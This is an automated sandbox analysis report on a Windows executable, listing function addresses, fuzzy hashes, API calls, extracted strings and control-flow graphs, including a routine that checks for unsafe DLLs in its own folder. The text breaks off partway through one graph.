                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: CMT
                                                  • API String ID: 3668304517-2756464174
                                                  • Opcode ID: 1fdd01db6e3aa44ea001be8250f3d4473abea029c39917a2ebd0d9ae72df00d0
                                                  • Instruction ID: 913e9021f90f946daeca8114f61d885355bd335e43d50dc3404b918bca697d8a
                                                  • Opcode Fuzzy Hash: 1fdd01db6e3aa44ea001be8250f3d4473abea029c39917a2ebd0d9ae72df00d0
                                                  • Instruction Fuzzy Hash: C3E20322B28A8286EB18EF75E4662FD67A1FB44789F404075DA9EC3697DF3CE055C300
                                                  Function 00007FF6CA9D40BC Relevance: 10.7, APIs: 7, Instructions: 153fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3505 7ff6ca9d40bc-7ff6ca9d40f3 3506 7ff6ca9d41d2-7ff6ca9d41df FindNextFileW 3505->3506 3507 7ff6ca9d40f9-7ff6ca9d4101 3505->3507 3510 7ff6ca9d41f3-7ff6ca9d41f6 3506->3510 3511 7ff6ca9d41e1-7ff6ca9d41f1 GetLastError 3506->3511 3508 7ff6ca9d4103 3507->3508 3509 7ff6ca9d4106-7ff6ca9d4118 FindFirstFileW 3507->3509 3508->3509 3509->3510 3512 7ff6ca9d411e-7ff6ca9d4146 call 7ff6ca9d6a0c 3509->3512 3514 7ff6ca9d4211-7ff6ca9d4253 call 7ff6ca9f797c call 7ff6ca9c129c call 7ff6ca9d8090 3510->3514 3515 7ff6ca9d41f8-7ff6ca9d4200 3510->3515 3513 7ff6ca9d41ca-7ff6ca9d41cd 3511->3513 3525 7ff6ca9d4167-7ff6ca9d4170 3512->3525 3526 7ff6ca9d4148-7ff6ca9d4164 FindFirstFileW 3512->3526 3516 7ff6ca9d42eb-7ff6ca9d430e call 7ff6ca9f2320 3513->3516 3541 7ff6ca9d4255-7ff6ca9d426c 3514->3541 3542 7ff6ca9d428c-7ff6ca9d42e6 call 7ff6ca9df168 * 3 3514->3542 3518 7ff6ca9d4202 3515->3518 3519 7ff6ca9d4205-7ff6ca9d420c call 7ff6ca9c20b0 3515->3519 3518->3519 3519->3514 3529 7ff6ca9d4172-7ff6ca9d4189 3525->3529 3530 7ff6ca9d41a9-7ff6ca9d41ad 3525->3530 3526->3525 3534 7ff6ca9d41a4 call 7ff6ca9f220c 3529->3534 3535 7ff6ca9d418b-7ff6ca9d419e 3529->3535 3530->3510 3532 7ff6ca9d41af-7ff6ca9d41be GetLastError 3530->3532 3536 7ff6ca9d41c0-7ff6ca9d41c6 3532->3536 3537 7ff6ca9d41c8 3532->3537 3534->3530 3535->3534 3539 7ff6ca9d4315-7ff6ca9d431b call 7ff6ca9f7904 3535->3539 3536->3513 3536->3537 3537->3513 3544 7ff6ca9d426e-7ff6ca9d4281 3541->3544 3545 7ff6ca9d4287 call 7ff6ca9f220c 3541->3545 3542->3516 3544->3545 3548 7ff6ca9d430f-7ff6ca9d4314 call 7ff6ca9f7904 3544->3548 3545->3542 3548->3539
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                  • String ID:
                                                  • API String ID: 474548282-0
                                                  • Opcode ID: e00911ed99825cb93216281e8042c5d8089b28651dbc7c90a12e2ff066408ff5
                                                  • Instruction ID: 1101e94f7e9aa1a77f24888264b7e80292c380bffbdde0b35e3fe964680f70d3
                                                  • Opcode Fuzzy Hash: e00911ed99825cb93216281e8042c5d8089b28651dbc7c90a12e2ff066408ff5
                                                  • Instruction Fuzzy Hash: 7961D662A28A4281DA10DF28F8A627D6361FB957A5F104375EAFDC36DADF3CD485C700
                                                  Function 00007FF6CA9C5E24 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CMT
                                                  • API String ID: 0-2756464174
                                                  • Opcode ID: 8928320ae6cd716fc977bb68eff86db0b2a70291441e82f998a9964a40b9c2b9
                                                  • Instruction ID: a8db2d91175bcd0e0174774dbd0bca0134083cfa9138762753acd59282d4f7b5
                                                  • Opcode Fuzzy Hash: 8928320ae6cd716fc977bb68eff86db0b2a70291441e82f998a9964a40b9c2b9
                                                  • Instruction Fuzzy Hash: CA42D022B28A8196EB18EF74E1622FD67A1EB41349F0011B5DB9ED3697DF3CE559C300
                                                  Function 00007FF6CA9E1F20 Relevance: .3, Instructions: 337COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 00cc9b5d49baee892d39d1da46008d2b4229947a5b0a2c39888c4d08721f4c94
                                                  • Instruction ID: efbbdca3d94f27a5a7689730f41f2b52292adeaf78044f5c213916d3c61d9c99
                                                  • Opcode Fuzzy Hash: 00cc9b5d49baee892d39d1da46008d2b4229947a5b0a2c39888c4d08721f4c94
                                                  • Instruction Fuzzy Hash: D3E10322A182828AEB60CF28B4662BD7790FB84749F054179DBCED7787CE3DE581C744
                                                  Function 00007FF6CA9E3484 Relevance: .3, Instructions: 302COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8c3f9089be966249862bf56ce032710d6eb03eb50aa34be6e58aa05575d530c2
                                                  • Instruction ID: 3d1e9539036058e76cac4baab5e03012ca185695bb441bdeea7727cec419a48f
                                                  • Opcode Fuzzy Hash: 8c3f9089be966249862bf56ce032710d6eb03eb50aa34be6e58aa05575d530c2
                                                  • Instruction Fuzzy Hash: 0EB1E1A2B14AC9A2DE58CE66E5197EA7391B705FC5F448032DE8D8B742DF3CE155C340
                                                  Function 00007FF6CA9D4928 Relevance: .1, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                  • String ID:
                                                  • API String ID: 3340455307-0
                                                  • Opcode ID: 70d0a199513ddd0303306b6c1f9c9cd84068436a56a79b22c40158a956f58a9a
                                                  • Instruction ID: 9e6c6c1caea7236712f9481e8bce721bfe36a970f090002e8478b2d6cdd05c44
                                                  • Opcode Fuzzy Hash: 70d0a199513ddd0303306b6c1f9c9cd84068436a56a79b22c40158a956f58a9a
                                                  • Instruction Fuzzy Hash: D7410922F2565286FA64DF11B9627692252FBC4785F044034DE8DCB796CE3CE4C2C704
                                                  Function 00007FF6CA9DDFD0 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440libraryfileloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 7ff6ca9ddfd0-7ff6ca9de024 call 7ff6ca9f2450 GetModuleHandleW 3 7ff6ca9de07b-7ff6ca9de3a5 0->3 4 7ff6ca9de026-7ff6ca9de039 GetProcAddress 0->4 7 7ff6ca9de503-7ff6ca9de521 call 7ff6ca9d6454 call 7ff6ca9d7df4 3->7 8 7ff6ca9de3ab-7ff6ca9de3b4 call 7ff6ca9fb788 3->8 5 7ff6ca9de053-7ff6ca9de066 GetProcAddress 4->5 6 7ff6ca9de03b-7ff6ca9de04a 4->6 5->3 10 7ff6ca9de068-7ff6ca9de078 5->10 6->5 20 7ff6ca9de525-7ff6ca9de52f call 7ff6ca9d51a4 7->20 8->7 16 7ff6ca9de3ba-7ff6ca9de3fd call 7ff6ca9d6454 CreateFileW 8->16 10->3 21 7ff6ca9de403-7ff6ca9de416 SetFilePointer 16->21 22 7ff6ca9de4f0-7ff6ca9de4fe CloseHandle call 7ff6ca9c1fa0 16->22 28 7ff6ca9de564-7ff6ca9de5ac call 7ff6ca9f797c call 7ff6ca9c129c call 7ff6ca9d8090 call 7ff6ca9c1fa0 call 7ff6ca9d32bc 20->28 29 7ff6ca9de531-7ff6ca9de53c call 7ff6ca9ddd88 20->29 21->22 24 7ff6ca9de41c-7ff6ca9de43e ReadFile 21->24 22->7 24->22 27 7ff6ca9de444-7ff6ca9de452 24->27 31 7ff6ca9de800-7ff6ca9de807 call 7ff6ca9f2624 27->31 32 7ff6ca9de458-7ff6ca9de4ac call 7ff6ca9f797c call 7ff6ca9c129c 27->32 69 7ff6ca9de5b1-7ff6ca9de5b4 28->69 29->28 41 7ff6ca9de53e-7ff6ca9de562 CompareStringW 29->41 49 7ff6ca9de4c3-7ff6ca9de4d9 call 7ff6ca9dd0a0 32->49 41->28 42 7ff6ca9de5bd-7ff6ca9de5c6 41->42 42->20 47 7ff6ca9de5cc 42->47 50 7ff6ca9de5d1-7ff6ca9de5d4 47->50 64 7ff6ca9de4ae-7ff6ca9de4be call 7ff6ca9ddd88 49->64 65 7ff6ca9de4db-7ff6ca9de4eb call 7ff6ca9c1fa0 * 2 49->65 51 7ff6ca9de63f-7ff6ca9de642 50->51 52 7ff6ca9de5d6-7ff6ca9de5d9 50->52 55 7ff6ca9de7c2-7ff6ca9de7ff call 7ff6ca9c1fa0 * 2 call 7ff6ca9f2320 51->55 56 7ff6ca9de648-7ff6ca9de65b call 7ff6ca9d7eb0 call 7ff6ca9d51a4 51->56 57 7ff6ca9de5dd-7ff6ca9de62d call 7ff6ca9f797c call 7ff6ca9c129c call 7ff6ca9d8090 call 7ff6ca9c1fa0 call 7ff6ca9d32bc 52->57 82 7ff6ca9de661-7ff6ca9de701 call 7ff6ca9ddd88 * 2 call 7ff6ca9daae0 call 7ff6ca9dda98 call 7ff6ca9daae0 call 7ff6ca9ddc2c call 7ff6ca9e87ac call 7ff6ca9c19e0 56->82 83 7ff6ca9de706-7ff6ca9de753 call 7ff6ca9dda98 AllocConsole 56->83 108 7ff6ca9de62f-7ff6ca9de638 57->108 109 7ff6ca9de63c 57->109 64->49 65->22 76 7ff6ca9de5ce 69->76 77 7ff6ca9de5b6 69->77 76->50 77->42 100 7ff6ca9de7b4-7ff6ca9de7bb call 7ff6ca9c19e0 ExitProcess 82->100 94 7ff6ca9de755-7ff6ca9de7aa GetCurrentProcessId AttachConsole call 7ff6ca9de868 call 7ff6ca9de858 GetStdHandle WriteConsoleW Sleep FreeConsole 83->94 95 7ff6ca9de7b0 83->95 94->95 95->100 108->57 112 7ff6ca9de63a 108->112 109->51 112->51
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                  • API String ID: 1496594111-2013832382
                                                  • Opcode ID: f7f2a11762ce96c0b678dc2ee5f4093b28e28463b6618f01c06ebafbf4af03a3
                                                  • Instruction ID: 6c0e133e16d6708edc4f32919ba32f66293f704f3e0c79e017ed93cc5605f5b4
                                                  • Opcode Fuzzy Hash: f7f2a11762ce96c0b678dc2ee5f4093b28e28463b6618f01c06ebafbf4af03a3
                                                  • Instruction Fuzzy Hash: F8323C31A19B8299EB119FA0F8611E933B4FF48355F500276DA8E877A5EF3CE295C344
                                                  Function 00007FF6CA9D98DC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF6CA9D8E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CA9D8F8D
                                                  • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6CA9D9F75
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9DA42F
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9DA435
                                                    • Part of subcall function 00007FF6CA9E0BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CA9E0B44), ref: 00007FF6CA9E0BE9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                  • API String ID: 3629253777-3268106645
                                                  • Opcode ID: e9373c6c8447d3f6bd3ca8f7216f9b88ee08b61aa473e508913f217581450698
                                                  • Instruction ID: ddd0aab10df0a2d59dd0e151f093bec4949e8f1b07ab0da13436d91f5aec9ef1
                                                  • Opcode Fuzzy Hash: e9373c6c8447d3f6bd3ca8f7216f9b88ee08b61aa473e508913f217581450698
                                                  • Instruction Fuzzy Hash: 56621222F2968685EB10DF68E4662BD7361FB40B89F804175DA8DC7AD6EF3CE585C340
                                                  Function 00007FF6CA9F1900 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1921 7ff6ca9f1900-7ff6ca9f1989 call 7ff6ca9f1558 1924 7ff6ca9f19b4-7ff6ca9f19d1 1921->1924 1925 7ff6ca9f198b-7ff6ca9f19af call 7ff6ca9f1868 RaiseException 1921->1925 1926 7ff6ca9f19d3-7ff6ca9f19e4 1924->1926 1927 7ff6ca9f19e6-7ff6ca9f19ea 1924->1927 1933 7ff6ca9f1bb8-7ff6ca9f1bd5 1925->1933 1929 7ff6ca9f19ed-7ff6ca9f19f9 1926->1929 1927->1929 1931 7ff6ca9f1a1a-7ff6ca9f1a1d 1929->1931 1932 7ff6ca9f19fb-7ff6ca9f1a0d 1929->1932 1934 7ff6ca9f1ac4-7ff6ca9f1acb 1931->1934 1935 7ff6ca9f1a23-7ff6ca9f1a26 1931->1935 1941 7ff6ca9f1a13 1932->1941 1942 7ff6ca9f1b89-7ff6ca9f1b93 1932->1942 1937 7ff6ca9f1adf-7ff6ca9f1ae2 1934->1937 1938 7ff6ca9f1acd-7ff6ca9f1adc 1934->1938 1939 7ff6ca9f1a3d-7ff6ca9f1a52 LoadLibraryExA 1935->1939 1940 7ff6ca9f1a28-7ff6ca9f1a3b 1935->1940 1943 7ff6ca9f1b85 1937->1943 1944 7ff6ca9f1ae8-7ff6ca9f1aec 1937->1944 1938->1937 1945 7ff6ca9f1a54-7ff6ca9f1a67 GetLastError 1939->1945 1946 7ff6ca9f1aa9-7ff6ca9f1ab2 1939->1946 1940->1939 1940->1946 1941->1931 1953 7ff6ca9f1b95-7ff6ca9f1ba6 1942->1953 1954 7ff6ca9f1bb0 call 7ff6ca9f1868 1942->1954 1943->1942 1951 7ff6ca9f1aee-7ff6ca9f1af2 1944->1951 1952 7ff6ca9f1b1b-7ff6ca9f1b2e GetProcAddress 1944->1952 1955 7ff6ca9f1a7e-7ff6ca9f1aa4 call 7ff6ca9f1868 RaiseException 1945->1955 1956 7ff6ca9f1a69-7ff6ca9f1a7c 1945->1956 1947 7ff6ca9f1ab4-7ff6ca9f1ab7 FreeLibrary 1946->1947 1948 7ff6ca9f1abd 1946->1948 1947->1948 1948->1934 1951->1952 1960 7ff6ca9f1af4-7ff6ca9f1aff 1951->1960 1952->1943 1959 7ff6ca9f1b30-7ff6ca9f1b43 GetLastError 1952->1959 1953->1954 1962 7ff6ca9f1bb5 1954->1962 1955->1933 1956->1946 1956->1955 1964 7ff6ca9f1b45-7ff6ca9f1b58 1959->1964 1965 7ff6ca9f1b5a-7ff6ca9f1b81 call 7ff6ca9f1868 RaiseException call 7ff6ca9f1558 1959->1965 1960->1952 1966 7ff6ca9f1b01-7ff6ca9f1b08 1960->1966 1962->1933 1964->1943 1964->1965 1965->1943 1966->1952 1967 7ff6ca9f1b0a-7ff6ca9f1b0f 1966->1967 1967->1952 1969 7ff6ca9f1b11-7ff6ca9f1b19 1967->1969 1969->1943 1969->1952
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                  • String ID: H
                                                  • API String ID: 3432403771-2852464175
                                                  • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                  • Instruction ID: ce2d9c4e3d55c3c10452cdc56caaab7c09180db86fc34508a243aa49f0aafd3c
                                                  • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                  • Instruction Fuzzy Hash: 51917C32E14B528AEB44CFA5E8552AC33B0FB08B9AF144079EE8E97745EF38E445C340
                                                  Function 00007FF6CA9EF4E0 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 285windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1974 7ff6ca9ef4e0-7ff6ca9ef523 1975 7ff6ca9ef894-7ff6ca9ef8b9 call 7ff6ca9c1fa0 call 7ff6ca9f2320 1974->1975 1976 7ff6ca9ef529-7ff6ca9ef565 call 7ff6ca9f3cf0 1974->1976 1982 7ff6ca9ef56a-7ff6ca9ef571 1976->1982 1983 7ff6ca9ef567 1976->1983 1985 7ff6ca9ef582-7ff6ca9ef586 1982->1985 1986 7ff6ca9ef573-7ff6ca9ef577 1982->1986 1983->1982 1987 7ff6ca9ef58b-7ff6ca9ef596 1985->1987 1988 7ff6ca9ef588 1985->1988 1989 7ff6ca9ef57c-7ff6ca9ef580 1986->1989 1990 7ff6ca9ef579 1986->1990 1991 7ff6ca9ef59c 1987->1991 1992 7ff6ca9ef628 1987->1992 1988->1987 1989->1987 1990->1989 1993 7ff6ca9ef5a2-7ff6ca9ef5a9 1991->1993 1994 7ff6ca9ef62c-7ff6ca9ef62f 1992->1994 1995 7ff6ca9ef5ae-7ff6ca9ef5b3 1993->1995 1996 7ff6ca9ef5ab 1993->1996 1997 7ff6ca9ef631-7ff6ca9ef635 1994->1997 1998 7ff6ca9ef637-7ff6ca9ef63a 1994->1998 1999 7ff6ca9ef5e5-7ff6ca9ef5f0 1995->1999 2000 7ff6ca9ef5b5 1995->2000 1996->1995 1997->1998 2001 7ff6ca9ef660-7ff6ca9ef673 call 7ff6ca9d63ac 1997->2001 1998->2001 2002 7ff6ca9ef63c-7ff6ca9ef643 1998->2002 2003 7ff6ca9ef5f5-7ff6ca9ef5fa 1999->2003 2004 7ff6ca9ef5f2 1999->2004 2005 7ff6ca9ef5ca-7ff6ca9ef5d0 2000->2005 2013 7ff6ca9ef675-7ff6ca9ef693 call 7ff6ca9e13c4 2001->2013 2014 7ff6ca9ef698-7ff6ca9ef6ed call 7ff6ca9f797c call 7ff6ca9c129c call 7ff6ca9d32a8 call 7ff6ca9c1fa0 2001->2014 2002->2001 2006 7ff6ca9ef645-7ff6ca9ef65c 2002->2006 2008 7ff6ca9ef600-7ff6ca9ef607 2003->2008 2009 7ff6ca9ef8ba-7ff6ca9ef8c1 2003->2009 2004->2003 2010 7ff6ca9ef5d2 2005->2010 2011 7ff6ca9ef5b7-7ff6ca9ef5be 2005->2011 2006->2001 2015 7ff6ca9ef60c-7ff6ca9ef612 2008->2015 2016 7ff6ca9ef609 2008->2016 2017 7ff6ca9ef8c3 2009->2017 2018 7ff6ca9ef8c6-7ff6ca9ef8cb 2009->2018 2010->1999 2019 7ff6ca9ef5c3-7ff6ca9ef5c8 2011->2019 2020 7ff6ca9ef5c0 2011->2020 2013->2014 2041 